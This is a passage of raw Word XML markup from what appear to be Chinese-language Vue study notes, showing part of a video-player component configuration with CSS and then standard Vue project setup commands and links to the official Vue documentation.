          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认音量大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609F1AB9" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            control: true, //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是否显示控制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1215E" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            controlBtns: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF9FE26" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                "audioTrack",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097B9F8" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                "quality",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C6217B" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                "speedRate",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF42F9" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                "volume",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B94736" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                "setting",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EDCD05" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                "pip",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DEE998" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "pageFullScreen",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B44F94" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                "fullScreen",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5D8EB2" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            ], //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>显示所有按钮</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763829C3" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A71BA5" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDC61E2" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA3E5E1" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            // Assuming your video file is in the public directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6CD38" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            // videoSource: "http://localhost:8000/api/video/test2.mp4/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EBA713" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            videoSource: "http://localhost:81/test.mp4",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975538E" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            options,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75132548" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A2BEC" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C3E4D0" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DBE93" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF50464" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB634E4" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F17CA05" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE0EB0" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.image-main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56764CDA" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136F3C03" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5DF963" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09350A95" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E3B1C5" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.image-main .top {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427C2E3" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    position: absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C3CA9" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475FC9BB" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    right: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CAD676" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    left: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40924A4E" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    bottom: 50px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47395938" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    overflow-y: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E208CBC" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C40EDE" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197B3D2F" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.image-main .bottom {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E6E215" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    position: absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C0755" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    bottom: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34324190" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A0A8E" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    left: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743A9E0" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    right: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D8CA5E" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex items-center justify-center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD869BE" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD2F7E9" w14:textId="555D5F96" w:rsidR="00347805" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0583F" w14:textId="77777777" w:rsidR="00A56493" w:rsidRDefault="00A56493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57772DE2" w14:textId="77777777" w:rsidR="00A56493" w:rsidRDefault="00A56493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2999D722" w14:textId="77777777" w:rsidR="00A56493" w:rsidRDefault="00A56493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3DF72A" w14:textId="77777777" w:rsidR="00A56493" w:rsidRDefault="00A56493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7987A51D" w14:textId="77777777" w:rsidR="00A56493" w:rsidRDefault="00A56493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AEF566A" w14:textId="77777777" w:rsidR="00A56493" w:rsidRDefault="00A56493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4848B79F" w14:textId="77777777" w:rsidR="00A56493" w:rsidRDefault="00A56493" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63777C84" w14:textId="77777777" w:rsidR="00347805" w:rsidRDefault="00347805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C429257" w14:textId="77777777" w:rsidR="00347805" w:rsidRDefault="00347805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720B1CAF" w14:textId="77777777" w:rsidR="00347805" w:rsidRDefault="00347805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B93B3CE" w14:textId="77777777" w:rsidR="00347805" w:rsidRPr="00954DB1" w:rsidRDefault="00347805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598A0ACE" w14:textId="072E8EC7" w:rsidR="002E497B" w:rsidRPr="002E497B" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="714" w:name="_Toc159780144"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习</w:t>
      </w:r>
      <w:r w:rsidR="00954DB1">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00954DB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
      <w:bookmarkEnd w:id="714"/>
    </w:p>
    <w:p w14:paraId="7E906EB5" w14:textId="3D719CBE" w:rsidR="00615D6B" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidR="00B07C65" w:rsidRPr="00B07C65">
        <w:t>https://cn.vuejs.org/guide/introduction.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F400FB" w14:textId="2F6E8A94" w:rsidR="00615D6B" w:rsidRDefault="003A5882" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>演练场：</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5882">
        <w:t>https://play.vuejs.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBC872B" w14:textId="77777777" w:rsidR="003A5882" w:rsidRDefault="003A5882" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6307B21F" w14:textId="77777777" w:rsidR="003A5882" w:rsidRDefault="003A5882" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DC3237" w14:textId="59CAE90F" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nodejs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本之上：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BCD8C5" w14:textId="207A2E23" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8CA6FA" w14:textId="42183183" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F453F">
        <w:t>npm create vue@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435A7345" w14:textId="24BE221D" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A0F75" w14:textId="15750874" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C13C9E" w14:textId="46738BF5" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>pm run dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4FD2D9" w14:textId="77777777" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AEF0235" w14:textId="607E54B4" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目如果要发布到生产环境，使用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513441C" w14:textId="18D83A09" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm run build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A295625" w14:textId="7DD2BC30" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>/dist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹中为应用生成一个生产环境版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F18F1B" w14:textId="77777777" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFF8925" w14:textId="77777777" w:rsidR="003F453F" w:rsidRDefault="003F453F" w:rsidP="009222EB">
